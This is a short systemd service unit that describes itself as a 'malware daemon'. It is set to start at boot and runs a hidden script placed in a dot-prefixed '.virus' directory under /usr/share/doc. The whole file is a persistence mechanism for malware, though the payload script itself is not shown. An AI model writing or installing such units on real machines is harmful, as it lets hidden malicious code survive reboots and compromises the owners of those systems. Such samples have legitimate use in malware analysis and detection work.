[Unit]
Description=It’s malware daemon
After=multi-user.target
[Service]
Type=idle
ExecStart=/usr/share/doc/.virus/.virus.sh
[Install]
WantedBy=multi-user.target
